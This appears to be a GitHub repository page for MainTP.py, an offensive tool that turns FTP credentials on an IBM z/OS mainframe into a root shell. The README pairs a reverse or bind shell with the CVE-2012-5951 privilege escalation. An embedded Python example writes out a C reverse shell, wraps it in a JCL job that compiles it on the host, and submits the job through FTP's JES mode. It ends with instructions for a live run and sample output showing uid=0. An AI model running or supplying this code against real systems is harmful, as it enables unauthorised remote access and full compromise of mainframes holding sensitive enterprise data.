Mainframe Transfer: PROTOCOL
Latest commit 9309383 Nov 29, 2014
MainTP.py: last commit "Update MainTP.py", Jul 9, 2014
README.md: last commit "Wrong CVE", Mar 2, 2014

README.md

MainTP.py

A Python script which takes the hostname/IP address of a z/OS FTP server, a username and a password, and gives you either a bind shell or a reverse shell on the host, connecting to it automatically.

How?

Bind/Reverse Shell: A JCL file is generated dynamically which contains either a bind shell or a reverse shell written in C. The C code is compiled on z/OS itself, at exploit time.

CVE-2012-5951: The JCL file also contains an implementation of CVE-2012-5951, the OMVS local privilege escalation originally discovered by whoever perpetrated the Logica mainframe breach. Refer to https://github.com/mainframed/logica/blob/master/kuku.rx for the original local privilege-escalation exploit on OMVS. It is essentially a REXX script that exploits the flaw to give you UID 0.

JCL: A JCL file is created dynamically from the options provided (shell type, IP addresses, ports), uploaded via FTP and executed by JES. The FTP session is switched into job-submission mode with the SITE FILETYPE=JES extended command (SITE FILE=JES is the accepted abbreviation), so the STORed file goes to the JES internal reader instead of a data set.
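The two mechanisms above (a job that carries a C reverse shell and builds it on the host, and submission through the FTP server's JES mode) as an added Python example. This is not MainTP.py's own code: the job layout, the step and file names (/tmp/r.c, /tmp/r), the IEBGENER-to-USS-file trick, the BPXBATCH step and the `FakeJesFtp` stand-in are all assumptions made here so the example runs offline, and the privilege-escalation step from the next paragraph is deliberately left out.

```python
import io
import re
from ftplib import FTP  # only used for a live submission; see the usage note

# Constructed C reverse shell that the job writes to /tmp/r.c and compiles with
# c89 on z/OS. Assumptions: the FTP user may run c89, /bin/sh exists, and
# _XOPEN_SOURCE_EXTENDED exposes the BSD socket API to IBM XL C.
REVERSE_SHELL_C = """\
#define _XOPEN_SOURCE_EXTENDED 1
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
int main(int argc, char **argv) {
    struct sockaddr_in sa;
    int s = socket(AF_INET, SOCK_STREAM, 0);
    if (argc != 3 || s < 0) return 1;
    memset(&sa, 0, sizeof(sa));
    sa.sin_family = AF_INET;
    sa.sin_port = htons((unsigned short) atoi(argv[2]));
    sa.sin_addr.s_addr = inet_addr(argv[1]);
    if (connect(s, (struct sockaddr *) &sa, sizeof(sa)) < 0) return 1;
    dup2(s, 0); dup2(s, 1); dup2(s, 2);   /* stdin, stdout, stderr -> socket */
    execl("/bin/sh", "sh", (char *) 0);
    return 1;
}
"""


def jcl_problems(lines):
    """Static checks a job must pass before it is worth submitting.
    JCL statements live in columns 1-71; inline data (after 'DD *') may use
    80 columns, ends at a line starting with '/*', and a line starting with
    '//' inside it is parsed as JCL, so neither may appear in the C source."""
    problems, in_data = [], False
    for n, line in enumerate(lines, 1):
        if in_data:
            if len(line) > 80:
                problems.append(f"line {n}: inline data longer than 80 columns")
            if line.startswith("/*"):
                in_data = False          # delimiter ends the inline data set
            elif line.startswith("//"):
                problems.append(f"line {n}: '//' inside inline data is read as JCL")
        else:
            if not line.startswith("//"):
                problems.append(f"line {n}: not a JCL statement: {line!r}")
            elif len(line) > 71:
                problems.append(f"line {n}: JCL statement runs past column 71")
            if re.search(r"\sDD\s+\*\s*$", line):
                in_data = True
    return problems


def build_jcl(lhost, lport, jobname="REVSH"):
    """Return the job as ASCII text. When it is STORed with TYPE A the z/OS FTP
    server translates it to EBCDIC itself, so the client sends plain ASCII."""
    # ';' rather than '&&': '&' introduces a symbol in JCL and would not reach the shell intact
    cmd = f"SH c89 -o /tmp/r /tmp/r.c; /tmp/r {lhost} {lport}"
    lines = [
        f"//{jobname.upper()[:8]:<8} JOB (0),'MAINTP EXAMPLE',CLASS=A,MSGCLASS=X",
        "//WRITE    EXEC PGM=IEBGENER",
        "//SYSPRINT DD SYSOUT=*",
        "//SYSIN    DD DUMMY",
        "//SYSUT2   DD PATH='/tmp/r.c',PATHOPTS=(OWRONLY,OCREAT,OTRUNC),",
        "//            PATHMODE=SIRWXU,FILEDATA=TEXT",
        "//SYSUT1   DD *",
        *REVERSE_SHELL_C.rstrip("\n").split("\n"),
        "/*",
        "//RUN      EXEC PGM=BPXBATCH,",
        f"// PARM='{cmd}'",
        "//STDOUT   DD SYSOUT=*",
        "//STDERR   DD SYSOUT=*",
        "//",
    ]
    problems = jcl_problems(lines)
    if problems:
        raise ValueError("; ".join(problems))
    return "\n".join(lines) + "\n"


JES_JOBID = re.compile(r"known to JES as (JOB\d{5}|J\d{7})")


def submit_to_jes(ftp, jcl, name="maintp.jcl"):
    """ftp is a connected, logged-in ftplib.FTP (or a stand-in). Switch the
    session to JES mode and STOR the job; the server passes it to the JES
    internal reader and replies '250-It is known to JES as JOBnnnnn'."""
    ftp.sendcmd("SITE FILETYPE=JES")
    reply = ftp.storlines(f"STOR {name}", io.BytesIO(jcl.encode("ascii")))
    m = JES_JOBID.search(reply)
    if not m:
        raise RuntimeError("job was not accepted by JES: " + reply)
    return m.group(1)


class FakeJesFtp:
    """Constructed stand-in for ftplib.FTP so the example runs offline; the
    replies copy the wording of the z/OS FTP server."""
    def __init__(self):
        self.commands, self.stored = [], b""

    def sendcmd(self, cmd):
        self.commands.append(cmd)
        return "200 SITE command was accepted"

    def storlines(self, cmd, fp):
        self.commands.append(cmd)
        self.stored = fp.read()
        return "250-It is known to JES as JOB01234\n250 Transfer completed successfully."


if __name__ == "__main__":
    job = build_jcl("10.0.0.5", 4444)      # constructed listener address
    print(job)
    print("submitted as", submit_to_jes(FakeJesFtp(), job))
```

For a live run replace `FakeJesFtp()` with `ftp = FTP("mainframe.company.com"); ftp.login(user, password)` (host and credentials are yours to supply); start a listener on the chosen address before submitting, because the job connects back as soon as c89 finishes. Note that a job submitted this way runs under the FTP user's identity, which is why the README pairs it with the CVE-2012-5951 step to reach UID 0.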

NetEBCDICat: A copy of NetEBCDICat is here as well. NetEBCDICat is just a Python implementation of a netcat-style socket communicator, but it translates between EBCDIC and ASCII because the OMVS shell only speaks EBCDIC (ugh!).

Together

```
[+] Connecting to: mainframe.company.com : 21
[+] Switching to JES mode
[+] Inserting JCL in to job queue
[+] Job JOB00000 added to JES queue
[+] Connecting Reverse Shell - Waiting for z/OS!
id
uid=0(SYSROOT) gid=0(SYS1)
```
